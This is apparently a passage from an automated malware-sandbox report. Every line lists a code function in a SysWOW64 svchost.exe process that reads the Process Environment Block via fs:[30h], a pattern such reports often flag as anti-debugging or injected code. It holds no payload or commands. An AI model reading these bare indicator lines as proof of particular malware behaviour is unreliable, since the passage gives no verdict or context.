Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]	2_2_03532050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]	2_2_035B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]	2_2_0355C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]	2_2_035B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]	2_2_035C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]	2_2_0352A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]	2_2_0352C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]	2_2_035B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0352C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]	2_2_035720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0352A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]	2_2_035380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]	2_2_035B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]	2_2_0353208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]	2_2_035280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]	2_2_035C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]	2_2_03530750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]	2_2_035BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]	2_2_035B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]	2_2_03538770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]	2_2_03530710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]	2_2_03560710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]	2_2_0356C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]	2_2_035AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]	2_2_035B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_035BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]	2_2_035D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]	2_2_035307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]	2_2_035E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]	2_2_0354C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]	2_2_03562674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]	2_2_03572619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]	2_2_035AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]	2_2_0354E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]	2_2_03566620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]	2_2_03568620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]	2_2_0353262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]	2_2_035666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0356C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]	2_2_035C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]	2_2_035365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]	2_2_035325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]	2_2_0356E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]	2_2_03564588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]	2_2_035EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]	2_2_0352645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]	2_2_0355245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]	2_2_035BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]	2_2_0356A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]	2_2_0352C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]	2_2_035304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]	2_2_035EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]	2_2_035644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_035BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]	2_2_035364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]	2_2_03528B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]	2_2_035DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]	2_2_035D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]	2_2_0352CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]	2_2_03604B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_035DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
